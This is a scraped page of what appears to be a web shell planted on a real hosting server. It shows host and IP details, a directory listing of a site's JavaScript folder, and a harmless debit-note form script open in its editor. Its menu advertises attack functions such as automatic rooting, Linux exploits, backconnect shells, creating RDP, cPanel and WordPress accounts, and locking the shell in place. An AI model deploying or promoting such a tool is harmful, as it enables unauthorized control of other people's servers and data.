Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
demo2 /
public /
js /
nota /
[ HOME SHELL ]
Name
Size
Permission
Action
detalles.js
847
B
-rw-r--r--
listar_credito.js
295
B
-rw-r--r--
listar_debito.js
293
B
-rw-r--r--
nuevo_credito.js
1.22
KB
-rw-r--r--
nuevo_debito.js
1.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nuevo_debito.js
$(function () { $('#frmNuevo').form({ keyboardShortcuts: false, fields: { motivo_nota: { rules: [{ type : 'empty', prompt : 'Seleccione una opcion'}] }, descripcion: { rules: [{ type : 'empty', prompt : 'Complete este campo'}] }, fecha_emision: { rules: [{ type : 'empty', prompt : 'Complete este campo'}] }, monto: { rules: [ { type : 'empty', prompt : 'Complete este campo'}, { type : 'regExp[/^[0-9]+([\.]{1}[0-9]+)?$/]', prompt : 'Ingrese un precio valido'}, ] }, }, inline : true, }); $('.btn_registrar').on('click', function() { if ($('#frmNuevo').form('is valid')) { $('#register_modal').modal({ closable: false, onApprove : function() { sendForm(); } }).modal('show'); } else { $('#frmNuevo').form('validate form'); } }); function sendForm() { var id_motivo = $('#motivo_nota').val(); var motivo = $('#motivo_nota option:selected').text(); var data = $('#frmNuevo').serialize()+'&id_motivo='+id_motivo+'&motivo='+motivo; $.requestApi('/nota/registrar_debito', data, 'POST', function (resolve) { if (resolve) { $.showMessages(resolve, true, APP_URL+'/nota/detalles/'+resolve.id_nota); } }); return false; }; });
Close